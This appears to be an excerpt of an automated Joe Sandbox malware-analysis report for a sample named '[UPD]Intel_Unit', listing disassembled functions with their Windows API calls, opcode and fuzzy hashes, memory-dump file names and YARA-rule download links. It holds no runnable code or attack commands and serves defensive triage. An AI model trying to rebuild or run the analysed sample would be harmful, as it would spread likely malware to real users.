API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
